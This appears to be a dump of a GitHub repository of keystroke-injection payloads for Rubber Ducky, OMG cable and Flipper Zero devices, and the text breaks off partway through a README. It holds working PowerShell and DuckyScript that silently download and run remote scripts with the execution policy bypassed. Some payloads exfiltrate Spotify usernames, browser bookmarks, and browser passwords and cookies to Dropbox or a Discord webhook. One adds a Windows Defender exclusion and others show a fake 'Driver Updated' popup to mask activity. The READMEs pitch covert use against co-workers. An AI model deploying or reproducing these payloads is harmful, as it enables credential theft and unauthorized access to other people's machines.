    "content": "<h1 align=\"center\">\n  <a href=\"https://git.io/typing-svg\">\n    <img src=\"https://readme-typing-svg.herokuapp.com/?lines=Welcome+to+the;Spotify+Spy!+😈&center=true&size=30\">\n  </a>\n</h1>\n\n<!-- TABLE OF CONTENTS -->\n<details>\n  <summary>Table of Contents</summary>\n  <ol>\n    <li><a href=\"#Description\">Description</a></li>\n    <li><a href=\"#getting-started\">Getting Started</a></li>\n    <li><a href=\"#Contributing\">Contributing</a></li>\n    <li><a href=\"#Version-History\">Version History</a></li>\n    <li><a href=\"#Contact\">Contact</a></li>\n    <li><a href=\"#Acknowledgments\">Acknowledgments</a></li>\n  </ol>\n</details>\n\n# Spotify-Spy\n\nThis payload is meant to exfiltrate spotify usernames on the device. Some people are too afraid to ask for their spotify or playlist so here is a sneaky way to do so.\n\n\n## Description\n\nHave you ever been too afraid to ask your co-worker for what song that was or what playlist this is? Fear no more!! Spotify-Spy will grab their spotify username for you so you dont have to socially interact with anyone!\n\n## Getting Started\n\n### Dependencies\n\n* DropBox or other file sharing service - Your Shared link for the intended file\n* Windows 10\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n\n### Executing program\n\n* Plug in your device\n* Invoke-WebRequest will be entered in the Run Box to download and execute the script from memory\n```\npowershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> ?dl=1; iex $pl\n```\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n\n## Contributing\n\nAll contributors names will be listed here\n\natomiczsec\n\nI am Jakoby\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n\n## Version History\n\n* 0.1\n    * Initial Release\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n\n<!-- CONTACT -->\n## Contact\n\n<h2 align=\"center\">📱 My Socials 📱</h2>\n<div align=center>\n<table>\n  <tr>\n    <td align=\"center\" width=\"96\">\n      <a href=\"https://www.youtube.com/channel/UC-7iJTFN8-CsTTuXd3Va6mA?sub_confirmation=1\">\n        <img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/youtube-svgrepo-com.svg width=\"48\" height=\"48\" alt=\"C#\" />\n      </a>\n      <br>YouTube\n    </td>\n    <td align=\"center\" width=\"96\">\n      <a href=\"https://twitter.com/atomiczsec\">\n        <img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/twitter.png width=\"48\" height=\"48\" alt=\"Python\" />\n      </a>\n      <br>Twitter\n    </td>\n    <td align=\"center\" width=\"96\">\n      <a href=\"https://discord.gg/MYYER2ZcJF\">\n        <img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/discord-v2-svgrepo-com.svg width=\"48\" height=\"48\" alt=\"Jsonnet\" />\n      </a>\n      <br>I-Am-Jakoby's Discord\n    </td>\n  </tr>\n</table>\n</div>\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n\n\n\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n\n<!-- ACKNOWLEDGMENTS -->\n## Acknowledgments\n\n* [Hak5](https://hak5.org/)\n* [I-Am-Jakoby](https://github.com/I-Am-Jakoby)\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n"
  },
  {
    "path": "OMG/payloads/Spotify-Spy/SS.ps1",
    "content": "#Spotify-Spy\r\n\r\n# See if file is a thing\r\nTest-Path -Path \"$env:APPDATA\\Spotify\\Users\"\r\n\r\n#Create varible for file name\r\n$F1 = \"$env:USERNAME-$(get-date -f yyyy-MM-dd_hh-mm)_spotify_users.txt\"\r\n\r\n# Gets the name of the spotify user\r\ncd \"$env:APPDATA\\Spotify\\Users\" \r\nGet-ChildItem > $F1\r\n\r\n# Copy Spotify User to Temp Directory to get sent to Dropbox\r\n\r\nCopy-Item \"$F1\" -Destination \"$env:tmp/$F1\" \r\n\r\n\r\nfunction DropBox-Upload {\r\n\r\n    [CmdletBinding()]\r\n    param (\r\n        \r\n    [Parameter (Mandatory = $True, ValueFromPipeline = $True)]\r\n    [Alias(\"f\")]\r\n    [string]$SourceFilePath\r\n    ) \r\n    $DropBoxAccessToken = \"YOUR-DROPBOX-ACCESS-TOKEN\"   # Replace with your DropBox Access Token\r\n    $outputFile = Split-Path $SourceFilePath -leaf\r\n    $TargetFilePath=\"/$outputFile\"\r\n    $arg = '{ \"path\": \"' + $TargetFilePath + '\", \"mode\": \"add\", \"autorename\": true, \"mute\": false }'\r\n    $authorization = \"Bearer \" + $DropBoxAccessToken\r\n    $headers = New-Object \"System.Collections.Generic.Dictionary[[String],[String]]\"\r\n    $headers.Add(\"Authorization\", $authorization)\r\n    $headers.Add(\"Dropbox-API-Arg\", $arg)\r\n    $headers.Add(\"Content-Type\", 'application/octet-stream')\r\n    Invoke-RestMethod -Uri https://content.dropboxapi.com/2/files/upload -Method Post -InFile $SourceFilePath -Headers $headers\r\n    }\r\n\r\nDropBox-Upload -f \"$env:tmp/$F1\"\r\nrm $F1\r\n\r\n$done = New-Object -ComObject Wscript.Shell;$done.Popup(\"Driver Updated\",1)\r\n"
  },
  {
    "path": "OMG/payloads/Spotify-Spy/payload.txt",
    "content": "REM     Title: Spotify-Spy\r\n\r\nREM     Author: atomiczsec\r\n\r\nREM     Description: This payload is meant to exfiltrate spotify usernames on the device. Some people are too afraid to ask for their spotify or playlist so here is a sneaky way to do so.\r\n\r\nREM     Target: Windows 10\r\n\r\nDELAY 2000\r\nGUI r\r\nDELAY 500\r\nSTRING powershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> dl=1; iex $pl\r\nENTER\r\n\r\nREM     Remember to replace the link with your DropBox shared link for the intended file to download\r\nREM     Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properlymode con:cols=14 lines=1\r\n"
  },
  {
    "path": "OMG/payloads/Water-UnMark/README.md",
    "content": "<img src=\"https://github.com/atomiczsec/My-Payloads/blob/main/Assets/watermark.png?raw=true\" width=\"200\">\n\n<h1 align=\"center\">\n  <a href=\"https://git.io/typing-svg\">\n    <img src=\"https://readme-typing-svg.herokuapp.com/?lines=Welcome+to+;Water-UnMark!+😈&center=true&size=30\">\n  </a>\n</h1>\n\n<!-- TABLE OF CONTENTS -->\n<details>\n  <summary>Table of Contents</summary>\n  <ol>\n    <li><a href=\"#Description\">Description</a></li>\n    <li><a href=\"#getting-started\">Getting Started</a></li>\n    <li><a href=\"#Contributing\">Contributing</a></li>\n    <li><a href=\"#Version-History\">Version History</a></li>\n    <li><a href=\"#Contact\">Contact</a></li>\n    <li><a href=\"#Acknowledgments\">Acknowledgments</a></li>\n  </ol>\n</details>\n\n# Water-UnMark\n\nA payload to get rid of the ugly windows activation watermark.\n\n## Description\nThis script will get rid of the ugly windows watermark. This script will automatically reboot the device. This is not activating your computer!!\n\n## Getting Started\n\n### Dependencies\n\n* Unactivated Windows 10 \n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n\n### Executing program\n\n* Plug in your device\n```\nSet-ItemProperty -Path \"HKLM:\\SYSTEM\\CurrentControlSet\\Services\\svsvc\" -Name Start -Value 4 -Force\n```\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n\n## Contributing\n\nAll contributors names will be listed here:\n\n[atomiczsec](https://github.com/atomiczsec)\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n\n## Version History\n\n* 0.1\n    * Initial Release\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n\n<!-- CONTACT -->\n## Contact\n\n<h2 align=\"center\">📱 My Socials 📱</h2>\n<div align=center>\n<table>\n  <tr>\n    <td align=\"center\" width=\"96\">\n      <a href=\"https://www.youtube.com/channel/UC-7iJTFN8-CsTTuXd3Va6mA?sub_confirmation=1\">\n        <img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/youtube-svgrepo-com.svg width=\"48\" height=\"48\" alt=\"C#\" />\n      </a>\n      <br>YouTube\n    </td>\n    <td align=\"center\" width=\"96\">\n      <a href=\"https://twitter.com/atomiczsec\">\n        <img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/twitter.png width=\"48\" height=\"48\" alt=\"Python\" />\n      </a>\n      <br>Twitter\n    </td>\n    <td align=\"center\" width=\"96\">\n      <a href=\"https://discord.gg/MYYER2ZcJF\">\n        <img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/discord-v2-svgrepo-com.svg width=\"48\" height=\"48\" alt=\"Jsonnet\" />\n      </a>\n      <br>I-Am-Jakoby's Discord\n    </td>\n  </tr>\n</table>\n</div>\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n\n\n\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n\n<!-- ACKNOWLEDGMENTS -->\n## Acknowledgments\n\n* [Hak5](https://hak5.org/)\n* [I-Am-Jakoby](https://github.com/I-Am-Jakoby)\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n"
  },
  {
    "path": "OMG/payloads/Water-UnMark/payload.txt",
    "content": "REM Title:       Water-UnMark\r\nREM Author:      atomiczsec\r\nREM Target OS:   Windows 10\r\nREM Description: This script will get rid of the ugly windows watermark. This script will automatically reboot the device. This is not activating your computer!!\r\n\r\nDELAY 2000\r\nGUI r\r\nDELAY 100\r\nSTRING powershell Start-Process powershell -verb runAs\r\nDELAY 1000\r\nALT Y\r\nDELAY 1000\r\nSTRING Set-ItemProperty -Path \"HKLM:\\SYSTEM\\CurrentControlSet\\Services\\svsvc\" -Name Start -Value 4 -Force\r\nENTER\r\nDELAY 100\r\nSTRING Restart-Computer -Force\r\nENTER\r\n"
  },
  {
    "path": "OMG/payloads/Water-UnMark/placeholder",
    "content": "\n"
  },
  {
    "path": "OMG/payloads/cApS-Troll/README.md",
    "content": "<h1 align=\"center\">\n  <a href=\"https://git.io/typing-svg\">\n    <img src=\"https://readme-typing-svg.herokuapp.com/?lines=Welcome+to+;cApS+Troll+😈&center=true&size=30\">\n  </a>\n</h1>\n\n<!-- TABLE OF CONTENTS -->\n<details>\n  <summary>Table of Contents</summary>\n  <ol>\n    <li><a href=\"#Description\">Description</a></li>\n    <li><a href=\"#getting-started\">Getting Started</a></li>\n    <li><a href=\"#Contributing\">Contributing</a></li>\n    <li><a href=\"#Version-History\">Version History</a></li>\n    <li><a href=\"#Contact\">Contact</a></li>\n    <li><a href=\"#Acknowledgments\">Acknowledgments</a></li>\n  </ol>\n</details>\n\n# cApS-Troll\n\nThis payload is meant to prank your victim with TURNING on AND off CAPS LOCK\n\n## Description\n\nThis payload is meant to prank your victim with TURNING on AND off CAPS LOCK\n\n## Getting Started\n\n### Dependencies\n\n* Pastebin or other file sharing service, Discord webhook or other webhook service\n* Windows 10,11\n* [Here](https://support.discord.com/hc/en-us/articles/228383668-Intro-to-Webhooks) is a tutorial on how to use Discord webhooks \n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n\n### Executing program\n\n* Plug in your device\n* Define the `DEFINE TARGET_URL example.com`\n* Device will download both files and place them in proper directories to then run the script\n```\npowershell -w h -NoP -NonI -ep Bypass $pl = iwr TARGET_URL dl=1; iex $pl\n```\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n\n## Contributing\n\nAll contributors names will be listed here:\n\n[atomiczsec](https://github.com/atomiczsec) &\n[I-Am-Jakoby](https://github.com/I-Am-Jakoby)\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n\n## Version History\n\n* 0.1\n    * Initial Release\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n\n<!-- CONTACT -->\n## Contact\n\n<h2 align=\"center\">📱 My Socials 📱</h2>\n<div align=center>\n<table>\n  <tr>\n    <td align=\"center\" width=\"96\">\n      <a href=\"https://www.youtube.com/channel/UC-7iJTFN8-CsTTuXd3Va6mA?sub_confirmation=1\">\n        <img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/youtube-svgrepo-com.svg width=\"48\" height=\"48\" alt=\"C#\" />\n      </a>\n      <br>YouTube\n    </td>\n    <td align=\"center\" width=\"96\">\n      <a href=\"https://twitter.com/atomiczsec\">\n        <img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/twitter.png width=\"48\" height=\"48\" alt=\"Python\" />\n      </a>\n      <br>Twitter\n    </td>\n    <td align=\"center\" width=\"96\">\n      <a href=\"https://discord.gg/MYYER2ZcJF\">\n        <img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/discord-v2-svgrepo-com.svg width=\"48\" height=\"48\" alt=\"Jsonnet\" />\n      </a>\n      <br>I-Am-Jakoby's Discord\n    </td>\n  </tr>\n</table>\n</div>\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n\n\n\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n\n<!-- ACKNOWLEDGMENTS -->\n## Acknowledgments\n\n* [Hak5](https://hak5.org/)\n* [I-Am-Jakoby](https://github.com/I-Am-Jakoby)\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n"
  },
  {
    "path": "OMG/payloads/cApS-Troll/a.ps1",
    "content": "while (1){\r\nStart-Sleep -Second 45\r\n$wsh = New-Object -ComObject WScript.Shell\r\n$wsh.SendKeys('{CAPSLOCK}')\r\nStart-Sleep -Second 15\r\n$wsh = New-Object -ComObject WScript.Shell\r\n$wsh.SendKeys('{CAPSLOCK}')\r\nStart-Sleep -Second 15\r\n$wsh = New-Object -ComObject WScript.Shell\r\n$wsh.SendKeys('{CAPSLOCK}')\r\nStart-Sleep -Second 15\r\n$wsh = New-Object -ComObject WScript.Shell\r\n$wsh.SendKeys('{CAPSLOCK}')\r\nStart-Sleep -Second 15\r\n$wsh = New-Object -ComObject WScript.Shell\r\n$wsh.SendKeys('{CAPSLOCK}')\r\n} \r\n"
  },
  {
    "path": "OMG/payloads/cApS-Troll/payload.txt",
    "content": "REM     Title: cApS-Troll\r\n\r\nREM     Author: atomiczsec\r\n\r\nREM     Description: This payload is meant to prank your victim with TURNING on AND off CAPS LOCK\r\n\r\nREM     Target: Windows 10\r\n\r\n\r\nDELAY 2000\r\nGUI r\r\nDELAY 500\r\nSTRING powershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> dl=1; iex $pl\r\nENTER\r\n\r\nREM     Remember to replace the link with your DropBox shared link for the intended file to download\r\nREM     Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properlymode con:cols=14 lines=1"
  },
  {
    "path": "OMG/payloads/placeholder",
    "content": "\n"
  },
  {
    "path": "README.md",
    "content": "# Hak5 & FlipperZero HID Attack Payloads & Functions\n\n\nThis repository contains payloads designed for various hardware hacking tools, including the USB Rubber Ducky, Bash Bunny, OMG cable, and FlipperZero. Primarily written in PowerShell and Duckyscript, these languages are commonly used for developing such payloads. If you have questions or need help, contact me using the information in this README. These payloads can automate processes, execute commands, or exploit system vulnerabilities, making them useful for penetration testing, cybersecurity research, and interacting with computer systems.\n\n<div align='center'>\n  \n### Quick Refrence\n  \n<a href='https://twitter.com/atomiczsec'>\n  \n<img src='https://img.shields.io/twitter/follow/atomiczsec?style=social'>\n  \n</a>\n  \n<a href='https://github.com/atomiczsec/My-Payloads/'>\n  \n<img src='https://img.shields.io/github/commit-activity/m/atomiczsec/My-Payloads'>\n  \n</a>\n  \n<a href='https://github.com/atomiczsec/'>\n  \n<img src='https://img.shields.io/github/followers/atomiczsec?style=social'>\n  \n</a>\n</div>\n\n\n\n\nTo learn more about Hak5 or the Flipper Zero , please visit their websites:\n\n- <a href=\"https://www.hak5.org\">www.hak5.org</a>\n\n- <a href=\"https://flipperzero.one/\">www.flipperzero.one</a>\n\nDISCLAIMER: This repository is for educational purposes only and is not intended for real-world usage. The creators of this repository\nare not responsible for any harm or damage that may occur as a result of using the information or code provided in this repository.\nBy accessing and using this repository, you acknowledge and agree that you do so at your own risk.\n"
  },
  {
    "path": "RubberDucky/payloads/Bookmark-Hog/BH.ps1",
    "content": "#Bookmark-Hog\r\n\r\n# See if file is a thing\r\nTest-Path -Path \"$env:USERPROFILE/AppData/Local/Google/Chrome/User Data/Default/Bookmarks\" -PathType Leaf\r\n\r\n#If the file does not exist, write to host.\r\nif (-not(Test-Path -Path \"$env:USERPROFILE/AppData/Local/Google/Chrome/User Data/Default/Bookmarks\" -PathType Leaf)) {\r\n     try {\r\n         Write-Host \"The chrome bookmark file has not been found. \"\r\n     }\r\n     catch {\r\n         throw $_.Exception.Message\r\n     }\r\n }\r\n # Copy Chrome Bookmarks to Bash Bunny\r\n  else {\r\n     $F1 = \"$env:USERNAME-$(get-date -f yyyy-MM-dd_hh-mm)_chrome_bookmarks.txt\"\r\n     Copy-Item \"$env:USERPROFILE/AppData/Local/Google/Chrome/User Data/Default/Bookmarks\" -Destination \"$env:tmp/$F1\" \r\n }\r\n\r\n# See if file is a thing\r\nTest-Path -Path \"$env:USERPROFILE/AppData/Local/Microsoft/Edge/User Data/Default/Bookmarks\" -PathType Leaf\r\n\r\n#If the file does not exist, write to host.\r\nif (-not(Test-Path -Path \"$env:USERPROFILE/AppData/Local/Microsoft/Edge/User Data/Default/Bookmarks\" -PathType Leaf)) {\r\n    try {\r\n        Write-Host \"The edge bookmark file has not been found. \"\r\n    }\r\n    catch {\r\n        throw $_.Exception.Message\r\n    }\r\n}\r\n # Copy Chrome Bookmarks to Bash Bunny\r\n else {\r\n    $F2 = \"$env:USERNAME-$(get-date -f yyyy-MM-dd_hh-mm)_edge_bookmarks.txt\"\r\n    Copy-Item \"$env:USERPROFILE/AppData/Local/Microsoft/Edge/User Data/Default/Bookmarks\" -Destination \"$env:tmp/$F2\" \r\n}\r\n\r\nfunction DropBox-Upload {\r\n\r\n    [CmdletBinding()]\r\n    param (\r\n        \r\n    [Parameter (Mandatory = $True, ValueFromPipeline = $True)]\r\n    [Alias(\"f\")]\r\n    [string]$SourceFilePath\r\n    ) \r\n    $DropBoxAccessToken = \"YOUR ACCESS TOKEN\"   # Replace with your DropBox Access Token\r\n    $outputFile = Split-Path $SourceFilePath -leaf\r\n    $TargetFilePath=\"/$outputFile\"\r\n    $arg = '{ \"path\": \"' + $TargetFilePath + '\", \"mode\": \"add\", \"autorename\": true, \"mute\": false }'\r\n    $authorization = \"Bearer \" + $DropBoxAccessToken\r\n    $headers = New-Object \"System.Collections.Generic.Dictionary[[String],[String]]\"\r\n    $headers.Add(\"Authorization\", $authorization)\r\n    $headers.Add(\"Dropbox-API-Arg\", $arg)\r\n    $headers.Add(\"Content-Type\", 'application/octet-stream')\r\n    Invoke-RestMethod -Uri https://content.dropboxapi.com/2/files/upload -Method Post -InFile $SourceFilePath -Headers $headers\r\n    }\r\n\r\nDropBox-Upload -f \"$env:tmp/$F1\"\r\nDropBox-Upload -f \"$env:tmp/$F2\"\r\n\r\n$done = New-Object -ComObject Wscript.Shell;$done.Popup(\"Driver Updated\",1)\r\n"
  },
  {
    "path": "RubberDucky/payloads/Bookmark-Hog/README.md",
    "content": "<img src=\"https://github.com/atomiczsec/My-Payloads/blob/main/Assets/bm-hog.png?\" width=\"200\">\n\n<h1 align=\"center\">\n  <a href=\"https://git.io/typing-svg\">\n    <img src=\"https://readme-typing-svg.herokuapp.com/?lines=Welcome+to+the;Bookmark+Hog!+😈&center=true&size=30\">\n  </a>\n</h1>\n\n<!-- TABLE OF CONTENTS -->\n<details>\n  <summary>Table of Contents</summary>\n  <ol>\n    <li><a href=\"#Description\">Description</a></li>\n    <li><a href=\"#getting-started\">Getting Started</a></li>\n    <li><a href=\"#Contributing\">Contributing</a></li>\n    <li><a href=\"#Version-History\">Version History</a></li>\n    <li><a href=\"#Contact\">Contact</a></li>\n    <li><a href=\"#Acknowledgments\">Acknowledgments</a></li>\n  </ol>\n</details>\n\n# Bookmark-Hog\n\nA payload to exfiltrate bookmarks of the 2 most popular browsers\n\n## Description\n\nThis payload will enumerate through the browser directories, looking for the file that stores the bookmark history\n\nThese files will be saved to the temp directory\n\nFinally dropbox will be used to exfiltrate the files to cloud storage\n\n## Getting Started\n\n### Dependencies\n\n* DropBox or other file sharing service - Your Shared link for the intended file\n* Windows 10,11\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n\n### Executing program\n\n* Plug in your device\n* Invoke-WebRequest will be entered in the Run Box to download and execute the script from memory\n```\npowershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> ?dl=1; iex $pl\n```\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n\n## Contributing\n\nAll contributors names will be listed here\n\natomiczsec\nI am Jakoby\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n\n## Version History\n\n* 0.1\n    * Initial Release\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n\n<!-- CONTACT -->\n## Contact\n\n<h2 align=\"center\">📱 My Socials 📱</h2>\n<div align=center>\n<table>\n  <tr>\n    <td align=\"center\" width=\"96\">\n      <a href=\"https://www.youtube.com/channel/UC-7iJTFN8-CsTTuXd3Va6mA?sub_confirmation=1\">\n        <img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/youtube-svgrepo-com.svg width=\"48\" height=\"48\" alt=\"C#\" />\n      </a>\n      <br>YouTube\n    </td>\n    <td align=\"center\" width=\"96\">\n      <a href=\"https://twitter.com/atomiczsec\">\n        <img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/twitter.png width=\"48\" height=\"48\" alt=\"Python\" />\n      </a>\n      <br>Twitter\n    </td>\n    <td align=\"center\" width=\"96\">\n      <a href=\"https://discord.gg/MYYER2ZcJF\">\n        <img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/discord-v2-svgrepo-com.svg width=\"48\" height=\"48\" alt=\"Jsonnet\" />\n      </a>\n      <br>I-Am-Jakoby's Discord\n    </td>\n  </tr>\n</table>\n</div>\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n\n\n\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n\n<!-- ACKNOWLEDGMENTS -->\n## Acknowledgments\n\n* [Hak5](https://hak5.org/)\n* [I-Am-Jakoby](https://github.com/I-Am-Jakoby)\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n"
  },
  {
    "path": "RubberDucky/payloads/Bookmark-Hog/payload.txt",
    "content": "REM     Title: Bookmark-Hog\r\n\r\nREM     Author: atomiczsec\r\n\r\nREM     Description: This payload is meant to exfiltrate bookmarks to the rubber ducky\r\n\r\nREM     Target: Windows 10, 11\r\n\r\nDELAY 2000\r\nGUI r\r\nDELAY 500\r\nSTRING powershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> dl=1; iex $pl\r\nENTER\r\n\r\nREM     Remember to replace the link with your DropBox shared link for the intended file to download\r\nREM     Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properlymode con:cols=14 lines=1\r\n"
  },
  {
    "path": "RubberDucky/payloads/Browser-Grab/README.md",
    "content": "<h1 align=\"center\">\n  <a href=\"https://git.io/typing-svg\">\n    <img src=\"https://readme-typing-svg.herokuapp.com/?lines=Welcome+to+the;Browser+Grab!+😈&center=true&size=30\">\n  </a>\n</h1>\n\n<!-- TABLE OF CONTENTS -->\n<details>\n  <summary>Table of Contents</summary>\n  <ol>\n    <li><a href=\"#Description\">Description</a></li>\n    <li><a href=\"#getting-started\">Getting Started</a></li>\n    <li><a href=\"#Contributing\">Contributing</a></li>\n    <li><a href=\"#Version-History\">Version History</a></li>\n    <li><a href=\"#Contact\">Contact</a></li>\n    <li><a href=\"#Acknowledgments\">Acknowledgments</a></li>\n  </ol>\n</details>\n\n# Browser-Grab\n\nA payload to exfiltrate bookmarks, passwords, history and cookies of most popular browsers\n\n## Description\n\nThis payload will exclude the C: drive on the device so Windows Defender doesnt flag the exe\n\nThis payload will then download an exe designed to exfiltrate bookmarks, passwords, history and cookies of most popular browsers\n\nCredits to the exe:\n\nhttps://github.com/moonD4rk/HackBrowserData\n\nFinally, discord will be used to exfiltrate the files to cloud storage\n\n## Getting Started\n\n### Dependencies\n\n* DropBox or other file sharing service - Your Shared link for the intended file\n* Admin privileges on the Device you are targeting\n* Windows 10,11\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n\n### Executing program\n\n* Plug in your device\n* Invoke-WebRequest will be entered in the Run Box to download and execute the script from memory\n```\npowershell -w h -NoP -NonI -ep Bypass iwr <Your Shared link for the intended file>?dl=1 | iex\n```\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n\n## Contributing\n\nAll contributors names will be listed here\n\natomiczsec\n\nI am Jakoby\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n\n## Version History\n\n* 0.1\n    * Initial Release\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n\n<!-- CONTACT -->\n## Contact\n\n<h2 align=\"center\">📱 My Socials 📱</h2>\n<div align=center>\n<table>\n  <tr>\n    <td align=\"center\" width=\"96\">\n      <a href=\"https://www.youtube.com/channel/UC-7iJTFN8-CsTTuXd3Va6mA?sub_confirmation=1\">\n        <img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/youtube-svgrepo-com.svg width=\"48\" height=\"48\" alt=\"C#\" />\n      </a>\n      <br>YouTube\n    </td>\n    <td align=\"center\" width=\"96\">\n      <a href=\"https://twitter.com/atomiczsec\">\n        <img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/twitter.png width=\"48\" height=\"48\" alt=\"Python\" />\n      </a>\n      <br>Twitter\n    </td>\n    <td align=\"center\" width=\"96\">\n      <a href=\"https://discord.gg/MYYER2ZcJF\">\n        <img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/discord-v2-svgrepo-com.svg width=\"48\" height=\"48\" alt=\"Jsonnet\" />\n      </a>\n      <br>I-Am-Jakoby's Discord\n    </td>\n  </tr>\n</table>\n</div>\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n\n\n\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n\n<!-- ACKNOWLEDGMENTS -->\n## Acknowledgments\n\n* [Hak5](https://hak5.org/)\n* [I-Am-Jakoby](https://github.com/I-Am-Jakoby)\n* [Author of EXE](https://github.com/moonD4rk/HackBrowserData)\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n"
  },
  {
    "path": "RubberDucky/payloads/Browser-Grab/b.ps1",
    "content": "function Upload-Discord {\n\n[CmdletBinding()]\nparam (\n    [parameter(Position=0,Mandatory=$False)]\n    [string]$file,\n    [parameter(Position=1,Mandatory=$False)]\n    [string]$text \n)\n\n$hookurl = 'YOUR-DISCORD-WEBHOOK'\n\n$Body = @{\n  'username' = $env:username\n  'content' = $text\n}\n\nif (-not ([string]::IsNullOrEmpty($text))){\nInvoke-RestMethod -ContentType 'Application/Json' -Uri $hookurl  -Method Post -Body ($Body | ConvertTo-Json)};\n\nif (-not ([string]::IsNullOrEmpty($file))){curl.exe -F \"file1=@$file\" $hookurl}\n}\n\n\n\n# Add $env:tmp to exlusions so Windows Defender doesnt flag the exe we will download\nAdd-MpPreference -ExclusionPath $env:tmp\n\n# Download the exe and save it to temp directory\niwr \"https://github.com/atomiczsec/My-Payloads/blob/main/Assets/browser.exe?raw=true\" -outfile \"$env:tmp\\browser.exe\"\n\n# Execute the Browser Stealer\ncd $env:tmp;Start-Process -FilePath \"$env:tmp\\browser.exe\" -WindowStyle h -Wait\n\n# Exfiltrate the loot to discord\nCompress-Archive -Path \"$env:tmp\\results\" -DestinationPath $env:tmp\\browserdata.zip\nUpload-Discord -file \"$env:tmp\\browserdata.zip\"\n"
  },
  {
    "path": "RubberDucky/payloads/Browser-Grab/payload.txt",
    "content": "REM     Title: Browser-Grab\nREM     Author: atomiczsec\nREM     Description: A payload to exfiltrate bookmarks, passwords, history and cookies of most popular browsers\nREM     Target: Windows 10\n\n\nDELAY 2000\nGUI r \nDELAY 1000\nSTRINGLN powershell saps powershell -verb runas\nDELAY 1000\nALT y\nDELAY 1000\nSTRINGLN irm https:// <Your Shared link for the intended file>?dl=1 | iex\n\nREM     Remember to replace the link with your DropBox shared link for the intended file to download\nREM     Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properly\n"
  },
  {
    "path": "RubberDucky/payloads/Copy-And-Waste/I.bat",
    "content": "@echo off\r\npowershell -Command \"& {cd \"$env:userprofile\\AppData\\Roaming\"; powershell -w h -NoP -NonI -Ep Bypass -File \"c.ps1\"}\"\r\npause\r\n"
  },
  {
    "path": "RubberDucky/payloads/Copy-And-Waste/README.md",
    "content": "<img src=\"https://github.com/atomiczsec/My-Payloads/blob/main/Assets/caw.png\" width=\"200\">\n\n<h1 align=\"center\">\n  <a href=\"https://git.io/typing-svg\">\n    <img src=\"https://readme-typing-svg.herokuapp.com/?lines=Welcome+to+;Copy+And+Waste!+😈&center=true&size=30\">\n  </a>\n</h1>\n\n<!-- TABLE OF CONTENTS -->\n<details>\n  <summary>Table of Contents</summary>\n  <ol>\n    <li><a href=\"#Description\">Description</a></li>\n    <li><a href=\"#getting-started\">Getting Started</a></li>\n    <li><a href=\"#Contributing\">Contributing</a></li>\n    <li><a href=\"#Version-History\">Version History</a></li>\n    <li><a href=\"#Contact\">Contact</a></li>\n    <li><a href=\"#Acknowledgments\">Acknowledgments</a></li>\n  </ol>\n</details>\n\n# Copy-And-Waste\n\nA payload to exfiltrate clipboard contents\n\n## Description\n\nThis payload uses iwr to download 2 files \n* I.bat\n* c.ps1\n\n**I.bat** is 